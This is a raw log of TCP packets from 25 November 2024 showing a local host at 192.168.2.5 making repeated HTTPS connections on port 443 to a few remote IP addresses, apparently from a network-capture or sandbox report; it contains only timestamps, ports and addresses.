Nov 25, 2024 11:34:38.547372103 CET	443	50058	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.626034975 CET	443	50054	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.629113913 CET	443	50054	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.632069111 CET	50054	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.632153988 CET	50054	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.632173061 CET	443	50054	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.632190943 CET	50054	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.632195950 CET	443	50054	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.636790037 CET	50059	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.636828899 CET	443	50059	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.636909008 CET	50059	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.637072086 CET	50059	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.637087107 CET	443	50059	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.677650928 CET	443	50053	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.680831909 CET	443	50053	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.684082031 CET	50053	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.684153080 CET	50053	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.684166908 CET	443	50053	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.684179068 CET	50053	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.684191942 CET	443	50053	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.687370062 CET	50060	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.687402964 CET	443	50060	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.687493086 CET	50060	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.687671900 CET	50060	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.687688112 CET	443	50060	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.752732038 CET	443	50055	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.756527901 CET	50055	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.756551981 CET	443	50055	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:38.756982088 CET	50055	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:38.756987095 CET	443	50055	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:39.195883036 CET	443	50055	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:39.199336052 CET	443	50055	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:39.199390888 CET	443	50055	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:39.199413061 CET	50055	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:39.199457884 CET	50055	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:39.199512959 CET	50055	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:39.199531078 CET	443	50055	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:39.199542046 CET	50055	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:39.199546099 CET	443	50055	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:39.202240944 CET	50061	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:39.202287912 CET	443	50061	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:39.202373981 CET	50061	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:39.202523947 CET	50061	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:39.202538013 CET	443	50061	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:39.462980032 CET	443	49998	23.1.237.91	192.168.2.5
Nov 25, 2024 11:34:39.463063002 CET	49998	443	192.168.2.5	23.1.237.91
Nov 25, 2024 11:34:39.676433086 CET	443	50056	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:39.676570892 CET	50056	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:39.677048922 CET	50056	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:39.677062988 CET	443	50056	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:39.678781033 CET	50056	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:39.678788900 CET	443	50056	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:39.678862095 CET	50056	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:39.678884983 CET	443	50056	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:39.678956985 CET	50056	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:39.678982019 CET	443	50056	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:39.678992033 CET	50056	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:39.679003000 CET	443	50056	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:39.679075956 CET	50056	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:39.679106951 CET	50056	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:39.679141998 CET	443	50056	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:39.679171085 CET	50056	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:39.679178953 CET	443	50056	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:39.679208040 CET	50056	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:39.679222107 CET	443	50056	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:39.679239035 CET	50056	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:39.679246902 CET	443	50056	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:40.264856100 CET	443	50058	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.265358925 CET	50058	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.265381098 CET	443	50058	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.265846014 CET	50058	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.265850067 CET	443	50058	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.313002110 CET	443	50057	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.313431978 CET	50057	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.313457012 CET	443	50057	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.313910961 CET	50057	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.313916922 CET	443	50057	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.417753935 CET	443	50059	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.418272972 CET	50059	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.418307066 CET	443	50059	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.418720961 CET	50059	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.418726921 CET	443	50059	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.470987082 CET	443	50060	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.471330881 CET	50060	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.471350908 CET	443	50060	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.471708059 CET	50060	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.471714020 CET	443	50060	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.699023962 CET	443	50058	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.702045918 CET	443	50058	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.702097893 CET	443	50058	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.702110052 CET	50058	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.702151060 CET	50058	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.702214956 CET	50058	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.702225924 CET	443	50058	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.702239037 CET	50058	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.702244043 CET	443	50058	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.704722881 CET	50062	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.704766989 CET	443	50062	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.704834938 CET	50062	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.704960108 CET	50062	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.704972029 CET	443	50062	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.765017986 CET	443	50057	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.769948006 CET	443	50057	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.770015001 CET	50057	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.770076036 CET	50057	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.770076036 CET	50057	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.770097017 CET	443	50057	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.770107985 CET	443	50057	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.773313046 CET	50063	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.773354053 CET	443	50063	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.773427963 CET	50063	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.773586988 CET	50063	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.773598909 CET	443	50063	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.863217115 CET	443	50059	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.866293907 CET	443	50059	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.866390944 CET	50059	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.866434097 CET	50059	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.866451979 CET	443	50059	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.866463900 CET	50059	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.866468906 CET	443	50059	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.869381905 CET	50064	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.869400024 CET	443	50064	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.869481087 CET	50064	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.869622946 CET	50064	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.869637012 CET	443	50064	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.913528919 CET	443	50060	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.916923046 CET	443	50060	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.916990042 CET	443	50060	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.916991949 CET	50060	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.917043924 CET	50060	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.917088032 CET	50060	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.917112112 CET	443	50060	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.917126894 CET	50060	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.917133093 CET	443	50060	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.919718027 CET	50065	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.919745922 CET	443	50065	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.919830084 CET	50065	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.919951916 CET	50065	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.919962883 CET	443	50065	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.980454922 CET	443	50061	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.980938911 CET	50061	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.980953932 CET	443	50061	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:40.982106924 CET	50061	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:40.982110977 CET	443	50061	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:41.389714956 CET	443	50056	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:41.389777899 CET	50056	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:41.389796019 CET	443	50056	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:41.389811993 CET	443	50056	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:41.389852047 CET	50056	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:41.389945030 CET	50056	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:41.389960051 CET	443	50056	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:41.425010920 CET	443	50061	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:41.428090096 CET	443	50061	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:41.428162098 CET	50061	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:41.428205013 CET	50061	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:41.428205013 CET	50061	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:41.428231955 CET	443	50061	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:41.428245068 CET	443	50061	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:41.431304932 CET	50066	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:41.431350946 CET	443	50066	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:41.431416988 CET	50066	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:41.431580067 CET	50066	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:41.431600094 CET	443	50066	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:41.434667110 CET	50067	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:41.434700966 CET	443	50067	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:41.434760094 CET	50067	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:41.434946060 CET	50067	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:41.434958935 CET	443	50067	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:42.431220055 CET	443	50062	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:42.435031891 CET	50062	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:42.435055017 CET	443	50062	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:42.435416937 CET	50062	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:42.435421944 CET	443	50062	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:42.584844112 CET	443	50064	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:42.585242033 CET	50064	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:42.585269928 CET	443	50064	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:42.585670948 CET	50064	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:42.585675955 CET	443	50064	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:42.617286921 CET	443	50063	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:42.617882967 CET	50063	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:42.617918015 CET	443	50063	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:42.618453026 CET	50063	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:42.618458033 CET	443	50063	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:42.642227888 CET	443	50065	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:42.643891096 CET	50065	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:42.643909931 CET	443	50065	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:42.644345999 CET	50065	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:42.644351006 CET	443	50065	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:42.864562035 CET	443	50062	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:42.867480993 CET	443	50062	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:42.867587090 CET	443	50062	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:42.867592096 CET	50062	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:42.867779016 CET	50062	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:42.867779016 CET	50062	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:42.867779016 CET	50062	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:42.870424032 CET	50068	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:42.870465040 CET	443	50068	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:42.870541096 CET	50068	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:42.870686054 CET	50068	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:42.870699883 CET	443	50068	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:42.881360054 CET	443	50067	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:42.881462097 CET	50067	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:42.882004023 CET	50067	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:42.882013083 CET	443	50067	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:42.883709908 CET	50067	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:42.883716106 CET	443	50067	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:43.020924091 CET	443	50064	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.020953894 CET	443	50064	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.021135092 CET	50064	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.021156073 CET	443	50064	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.021440983 CET	50064	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.021440983 CET	50064	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.021461964 CET	443	50064	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.021646976 CET	443	50064	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.021682978 CET	443	50064	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.021760941 CET	50064	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.024149895 CET	50069	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.024214983 CET	443	50069	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.024302959 CET	50069	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.024475098 CET	50069	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.024488926 CET	443	50069	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.070036888 CET	443	50063	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.073287010 CET	443	50063	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.073451996 CET	50063	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.073451996 CET	50063	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.073451996 CET	50063	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.075295925 CET	443	50065	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.075385094 CET	443	50065	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.075531006 CET	50065	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.075550079 CET	443	50065	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.075901985 CET	50070	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.075932980 CET	443	50070	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.075970888 CET	50065	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.075994968 CET	443	50065	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.076010942 CET	50070	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.076052904 CET	50065	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.076128006 CET	50070	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.076143026 CET	443	50070	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.076349020 CET	443	50065	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.076432943 CET	443	50065	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.078011036 CET	50071	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.078037977 CET	443	50071	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.078057051 CET	50065	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.078107119 CET	50071	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.078242064 CET	50071	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.078253984 CET	443	50071	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.179930925 CET	50062	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.179950953 CET	443	50062	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.214845896 CET	443	50066	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.215563059 CET	50066	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.215583086 CET	443	50066	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.215995073 CET	50066	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.216000080 CET	443	50066	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.382925034 CET	50063	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.382956028 CET	443	50063	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.658416986 CET	443	50066	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.661386967 CET	443	50066	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.661444902 CET	443	50066	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.661501884 CET	50066	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.661552906 CET	50066	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.661618948 CET	50066	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.661618948 CET	50066	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.661638975 CET	443	50066	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.661643982 CET	443	50066	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.664666891 CET	50072	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.664717913 CET	443	50072	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.664802074 CET	50072	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.664968014 CET	50072	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:43.664985895 CET	443	50072	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:43.808621883 CET	443	50067	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:43.808711052 CET	443	50067	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:43.808723927 CET	50067	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:43.808760881 CET	50067	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:43.809014082 CET	50067	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:43.809030056 CET	443	50067	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:43.810405970 CET	50073	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:43.810439110 CET	443	50073	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:43.810514927 CET	50073	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:43.810771942 CET	50073	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:43.810782909 CET	443	50073	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:44.660407066 CET	443	50068	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:44.660876036 CET	50068	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:44.660902023 CET	443	50068	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:44.661310911 CET	50068	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:44.661318064 CET	443	50068	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:44.790813923 CET	443	50070	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:44.791259050 CET	50070	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:44.791275978 CET	443	50070	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:44.791712999 CET	50070	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:44.791718006 CET	443	50070	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:44.805068016 CET	443	50069	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:44.805543900 CET	50069	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:44.805567980 CET	443	50069	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:44.805938959 CET	50069	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:44.805944920 CET	443	50069	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:44.858180046 CET	443	50071	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:44.858578920 CET	50071	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:44.858589888 CET	443	50071	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:44.859010935 CET	50071	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:44.859015942 CET	443	50071	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.104532957 CET	443	50068	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.104706049 CET	443	50068	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.104903936 CET	50068	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.104924917 CET	50068	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.104924917 CET	50068	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.104935884 CET	443	50068	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.104943037 CET	443	50068	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.107640982 CET	50074	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.107678890 CET	443	50074	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.107757092 CET	50074	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.107922077 CET	50074	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.107940912 CET	443	50074	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.224843979 CET	443	50070	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.228085995 CET	443	50070	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.228161097 CET	50070	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.228199005 CET	50070	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.228203058 CET	443	50070	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.228218079 CET	50070	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.228220940 CET	443	50070	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.230678082 CET	50075	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.230695963 CET	443	50075	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.230766058 CET	50075	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.230892897 CET	50075	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.230905056 CET	443	50075	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.260010958 CET	443	50073	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:45.260070086 CET	50073	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:45.260447979 CET	50073	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:45.260452986 CET	443	50073	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:45.262290001 CET	50073	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:45.262295008 CET	443	50073	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:45.301887035 CET	443	50071	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.305036068 CET	443	50071	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.305077076 CET	443	50071	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.305083036 CET	50071	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.305126905 CET	50071	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.307845116 CET	50071	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.307861090 CET	443	50071	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.307876110 CET	50071	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:45.307882071 CET	443	50071	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:45.310375929 CET	50076	443	192.168.2.5	13.107.246.63
